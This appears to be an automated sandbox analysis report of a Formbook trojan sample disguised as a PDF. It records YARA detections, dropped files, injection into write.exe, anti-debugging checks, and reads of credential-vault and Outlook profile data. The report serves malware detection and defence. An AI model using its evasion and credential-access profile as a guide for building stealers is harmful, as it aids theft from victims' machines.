Source: BM-FM_NR.24040718PDF.exe, 00000002.00000002.13639421205.0000000006905000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamewritej% vs BM-FM_NR.24040718PDF.exe
Source: BM-FM_NR.24040718PDF.exe, 00000002.00000003.13537482631.0000000036A34000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs BM-FM_NR.24040718PDF.exe
Source: BM-FM_NR.24040718PDF.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: 00000005.00000002.17951504935.0000000002FC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000006.00000002.17952328354.0000000000690000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000002.00000002.13649482189.0000000036790000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000005.00000002.17955935422.0000000004FA0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000005.00000002.17956116305.0000000004FE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000004.00000002.17954988019.0000000003120000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000002.00000002.13650313872.0000000036E00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: classification engine Classification label: mal96.troj.spyw.evad.winEXE@7/7@29/13
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 0_2_00404352 GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA, 0_2_00404352
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 0_2_0040205E CoCreateInstance,MultiByteToWideChar, 0_2_0040205E
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\skebladenes
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe File created: C:\Users\user\AppData\Local\Temp\nseCCE4.tmp
Source: BM-FM_NR.24040718PDF.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe File read: C:\Users\desktop.ini
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: BM-FM_NR.24040718PDF.exe Virustotal: Detection: 12%
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe File read: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe
Source: unknown Process created: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe "C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe"
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Process created: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe "C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe"
Source: C:\Program Files (x86)\UEoBkmdrdVTeIzMRbVVhquLLMYSPODYnRngAjVnDHe\asoFfnDVnWYESbbZcbazpTYkAQVO.exe Process created: C:\Windows\SysWOW64\write.exe "C:\Windows\SysWOW64\write.exe"
Source: C:\Windows\SysWOW64\write.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Process created: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe "C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe"
Source: C:\Program Files (x86)\UEoBkmdrdVTeIzMRbVVhquLLMYSPODYnRngAjVnDHe\asoFfnDVnWYESbbZcbazpTYkAQVO.exe Process created: C:\Windows\SysWOW64\write.exe "C:\Windows\SysWOW64\write.exe"
Source: C:\Windows\SysWOW64\write.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Section loaded: edgegdi.dll
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Section loaded: userenv.dll
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Section loaded: propsys.dll
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Section loaded: dwmapi.dll
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Section loaded: oleacc.dll
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Section loaded: version.dll
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Section loaded: shfolder.dll
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Section loaded: wldp.dll
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Section loaded: riched20.dll
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Section loaded: usp10.dll
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Section loaded: msls31.dll
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Section loaded: textinputframework.dll
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Section loaded: coreuicomponents.dll
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Section loaded: coremessaging.dll
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Section loaded: ntmarta.dll
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Section loaded: textshaping.dll
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Section loaded: profapi.dll
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Section loaded: powrprof.dll
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Section loaded: wkscli.dll
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Section loaded: netutils.dll
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Section loaded: edgegdi.dll
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Section loaded: umpdc.dll
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Section loaded: wininet.dll
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Section loaded: wldp.dll
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Section loaded: profapi.dll
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Section loaded: dnsapi.dll
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Section loaded: rasadhlp.dll
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Section loaded: schannel.dll
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Section loaded: mskeyprotect.dll
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Section loaded: ntasn1.dll
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Section loaded: msasn1.dll
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Section loaded: dpapi.dll
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Section loaded: gpapi.dll
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Section loaded: ncrypt.dll
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Section loaded: ncryptsslp.dll
Source: C:\Windows\SysWOW64\write.exe Section loaded: edgegdi.dll
Source: C:\Windows\SysWOW64\write.exe Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\write.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\write.exe Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\write.exe Section loaded: ieframe.dll
Source: C:\Windows\SysWOW64\write.exe Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\write.exe Section loaded: netapi32.dll
Source: C:\Windows\SysWOW64\write.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\write.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\write.exe Section loaded: winhttp.dll
Source: C:\Windows\SysWOW64\write.exe Section loaded: wkscli.dll
Source: C:\Windows\SysWOW64\write.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\write.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\write.exe Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\write.exe Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\write.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\write.exe Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\write.exe Section loaded: mlang.dll
Source: C:\Windows\SysWOW64\write.exe Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\write.exe Section loaded: winsqlite3.dll
Source: C:\Windows\SysWOW64\write.exe Section loaded: vaultcli.dll
Source: C:\Windows\SysWOW64\write.exe Section loaded: wintypes.dll
Source: C:\Windows\SysWOW64\write.exe Section loaded: dpapi.dll
Source: C:\Windows\SysWOW64\write.exe Section loaded: cryptbase.dll
Source: C:\Program Files (x86)\UEoBkmdrdVTeIzMRbVVhquLLMYSPODYnRngAjVnDHe\asoFfnDVnWYESbbZcbazpTYkAQVO.exe Section loaded: wininet.dll
Source: C:\Program Files (x86)\UEoBkmdrdVTeIzMRbVVhquLLMYSPODYnRngAjVnDHe\asoFfnDVnWYESbbZcbazpTYkAQVO.exe Section loaded: mswsock.dll
Source: C:\Program Files (x86)\UEoBkmdrdVTeIzMRbVVhquLLMYSPODYnRngAjVnDHe\asoFfnDVnWYESbbZcbazpTYkAQVO.exe Section loaded: dnsapi.dll
Source: C:\Program Files (x86)\UEoBkmdrdVTeIzMRbVVhquLLMYSPODYnRngAjVnDHe\asoFfnDVnWYESbbZcbazpTYkAQVO.exe Section loaded: iphlpapi.dll
Source: C:\Program Files (x86)\UEoBkmdrdVTeIzMRbVVhquLLMYSPODYnRngAjVnDHe\asoFfnDVnWYESbbZcbazpTYkAQVO.exe Section loaded: fwpuclnt.dll
Source: C:\Program Files (x86)\UEoBkmdrdVTeIzMRbVVhquLLMYSPODYnRngAjVnDHe\asoFfnDVnWYESbbZcbazpTYkAQVO.exe Section loaded: rasadhlp.dll
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\SysWOW64\write.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
Source: BM-FM_NR.24040718PDF.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: write.pdbGCTL source: BM-FM_NR.24040718PDF.exe, 00000002.00000002.13639421205.0000000006905000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: write.pdb source: BM-FM_NR.24040718PDF.exe, 00000002.00000002.13639421205.0000000006905000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: mshtml.pdb source: BM-FM_NR.24040718PDF.exe, 00000002.00000001.13262071242.0000000000649000.00000020.00000001.01000000.00000006.sdmp
Source: Binary string: wntdll.pdbUGP source: BM-FM_NR.24040718PDF.exe, 00000002.00000002.13649553951.0000000036AB0000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: BM-FM_NR.24040718PDF.exe, BM-FM_NR.24040718PDF.exe, 00000002.00000002.13649553951.0000000036AB0000.00000040.00001000.00020000.00000000.sdmp, write.exe
Source: Binary string: mshtml.pdbUGP source: BM-FM_NR.24040718PDF.exe, 00000002.00000001.13262071242.0000000000649000.00000020.00000001.01000000.00000006.sdmp

Data Obfuscation

Source: Yara match File source: 00000000.00000002.13454509223.0000000007965000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 0_2_10001A5D GlobalAlloc,lstrcpyA,lstrcpyA,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyA,GetModuleHandleA,LoadLibraryA,GetProcAddress,lstrlenA, 0_2_10001A5D
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 0_2_10002D20 push eax; ret 0_2_10002D4E
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36AB97A1 push es; iretd 2_2_36AB97A8
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36AB21AD pushad ; retf 0004h 2_2_36AB223F
Source: C:\Windows\SysWOW64\write.exe Code function: 5_2_051C08CD push ecx; mov dword ptr [esp], ecx 5_2_051C08D6
Source: C:\Windows\SysWOW64\write.exe Code function: 5_2_02FD4550 push edx; retf 5_2_02FD4551
Source: C:\Windows\SysWOW64\write.exe Code function: 5_2_02FC4535 push cs; ret 5_2_02FC453D
Source: C:\Windows\SysWOW64\write.exe Code function: 5_2_02FC6E86 pushfd ; iretd 5_2_02FC6E8B
Source: C:\Windows\SysWOW64\write.exe Code function: 5_2_02FC6E29 pushfd ; iretd 5_2_02FC6E8B
Source: C:\Windows\SysWOW64\write.exe Code function: 5_2_02FC8C36 pushfd ; iretd 5_2_02FC8C39
Source: C:\Windows\SysWOW64\write.exe Code function: 5_2_02FD2C18 push edi; iretd 5_2_02FD2C3A
Source: C:\Windows\SysWOW64\write.exe Code function: 5_2_02FDF54E push esp; iretd 5_2_02FDF550
Source: C:\Windows\SysWOW64\write.exe Code function: 5_2_02FDFB69 push edi; retf 5_2_02FDFB89
Source: C:\Windows\SysWOW64\write.exe Code function: 5_2_02FCDEE9 push ebx; retf 5_2_02FCDEEE
Source: C:\Windows\SysWOW64\write.exe Code function: 5_2_02FC7EA4 push es; iretd 5_2_02FC7EAC
Source: C:\Windows\SysWOW64\write.exe Code function: 5_2_02FCDE9B pushad ; ret 5_2_02FCDE9C
Source: C:\Windows\SysWOW64\write.exe Code function: 5_2_02FCDE11 push es; retf 5_2_02FCDE12
Source: C:\Windows\SysWOW64\write.exe Code function: 5_2_02FC3F52 push EEC03D28h; ret 5_2_02FC3F5C
Source: C:\Windows\SysWOW64\write.exe Code function: 5_2_02FDFCD4 push edx; iretd 5_2_02FDFD03
Source: C:\Windows\SysWOW64\write.exe Code function: 5_2_02FDFD04 push edx; iretd 5_2_02FDFD03
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe File created: C:\Users\user\AppData\Local\Temp\nspCEF8.tmp\System.dll Jump to dropped file
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\skebladenes Jump to behavior
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\skebladenes\Trophaeum.Uno Jump to behavior
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\skebladenes\Filantroper.ove Jump to behavior
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\skebladenes\Skoleophold Jump to behavior
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\skebladenes\Skoleophold\Paleoatavistic.Rok179 Jump to behavior
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\skebladenes\Skoleophold\Hjrners133.txt Jump to behavior
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\skebladenes\Skoleophold\princelings.bar Jump to behavior
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\write.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B21763 rdtsc 2_2_36B21763
Source: C:\Windows\SysWOW64\write.exe Window / User API: threadDelayed 9050 Jump to behavior
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nspCEF8.tmp\System.dll Jump to dropped file
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe API coverage: 0.2 %
Source: C:\Windows\SysWOW64\write.exe API coverage: 2.6 %
Source: C:\Windows\SysWOW64\write.exe TID: 1580 Thread sleep count: 119 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\write.exe TID: 1580 Thread sleep time: -238000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\write.exe TID: 1580 Thread sleep count: 9050 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\write.exe TID: 1580 Thread sleep time: -18100000s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\UEoBkmdrdVTeIzMRbVVhquLLMYSPODYnRngAjVnDHe\asoFfnDVnWYESbbZcbazpTYkAQVO.exe TID: 7316 Thread sleep time: -120000s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\UEoBkmdrdVTeIzMRbVVhquLLMYSPODYnRngAjVnDHe\asoFfnDVnWYESbbZcbazpTYkAQVO.exe TID: 7316 Thread sleep count: 39 > 30 Jump to behavior
Source: C:\Program Files (x86)\UEoBkmdrdVTeIzMRbVVhquLLMYSPODYnRngAjVnDHe\asoFfnDVnWYESbbZcbazpTYkAQVO.exe TID: 7316 Thread sleep time: -58500s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\UEoBkmdrdVTeIzMRbVVhquLLMYSPODYnRngAjVnDHe\asoFfnDVnWYESbbZcbazpTYkAQVO.exe TID: 7316 Thread sleep count: 58 > 30 Jump to behavior
Source: C:\Program Files (x86)\UEoBkmdrdVTeIzMRbVVhquLLMYSPODYnRngAjVnDHe\asoFfnDVnWYESbbZcbazpTYkAQVO.exe TID: 7316 Thread sleep time: -58000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\write.exe Last function: Thread delayed
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 0_2_00406033 FindFirstFileA,FindClose, 0_2_00406033
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 0_2_004055D1 GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose, 0_2_004055D1
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 0_2_00402688 FindFirstFileA, 0_2_00402688
Source: C:\Windows\SysWOW64\write.exe Code function: 5_2_02FDB810 FindFirstFileW,FindNextFileW,FindClose, 5_2_02FDB810
Source: BM-FM_NR.24040718PDF.exe, 00000002.00000002.13639421205.0000000006905000.00000004.00000020.00020000.00000000.sdmp, BM-FM_NR.24040718PDF.exe, 00000002.00000003.13535224569.0000000006905000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe API call chain: ExitProcess graph end node
Source: C:\Windows\SysWOW64\write.exe Process information queried: ProcessInformation Jump to behavior
Source: C:\Windows\SysWOW64\write.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B21763 rdtsc 2_2_36B21763
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B234E0 NtCreateMutant,LdrInitializeThunk, 2_2_36B234E0
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 0_2_10001A5D GlobalAlloc,lstrcpyA,lstrcpyA,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyA,GetModuleHandleA,LoadLibraryA,GetProcAddress,lstrlenA, 0_2_10001A5D
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B5D69D mov eax, dword ptr fs:[00000030h] 2_2_36B5D69D
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36AEB5E0 mov eax, dword ptr fs:[00000030h] 2_2_36AEB5E0
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36AEB5E0 mov eax, dword ptr fs:[00000030h] 2_2_36AEB5E0
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B655E0 mov eax, dword ptr fs:[00000030h] 2_2_36B655E0
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B115EF mov eax, dword ptr fs:[00000030h] 2_2_36B115EF
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B6B5D3 mov eax, dword ptr fs:[00000030h] 2_2_36B6B5D3
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36ADF5C7 mov eax, dword ptr fs:[00000030h] 2_2_36ADF5C7
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36ADF5C7 mov eax, dword ptr fs:[00000030h] 2_2_36ADF5C7
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36ADF5C7 mov eax, dword ptr fs:[00000030h] 2_2_36ADF5C7
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36ADF5C7 mov eax, dword ptr fs:[00000030h] 2_2_36ADF5C7
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36ADF5C7 mov eax, dword ptr fs:[00000030h] 2_2_36ADF5C7
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36ADF5C7 mov eax, dword ptr fs:[00000030h] 2_2_36ADF5C7
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36ADF5C7 mov eax, dword ptr fs:[00000030h] 2_2_36ADF5C7
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36ADF5C7 mov eax, dword ptr fs:[00000030h] 2_2_36ADF5C7
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36ADF5C7 mov eax, dword ptr fs:[00000030h] 2_2_36ADF5C7
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36BB753C mov eax, dword ptr fs:[00000030h] 2_2_36BB753C
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36BB753C mov ecx, dword ptr fs:[00000030h] 2_2_36BB753C
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36BB753C mov eax, dword ptr fs:[00000030h] 2_2_36BB753C
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B1F523 mov eax, dword ptr fs:[00000030h] 2_2_36B1F523
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36AD753F mov eax, dword ptr fs:[00000030h] 2_2_36AD753F
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36AD753F mov eax, dword ptr fs:[00000030h] 2_2_36AD753F
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36AD753F mov eax, dword ptr fs:[00000030h] 2_2_36AD753F
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B11527 mov eax, dword ptr fs:[00000030h] 2_2_36B11527
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36AE3536 mov eax, dword ptr fs:[00000030h] 2_2_36AE3536
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36AE3536 mov eax, dword ptr fs:[00000030h] 2_2_36AE3536
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B8F51B mov eax, dword ptr fs:[00000030h] 2_2_36B8F51B
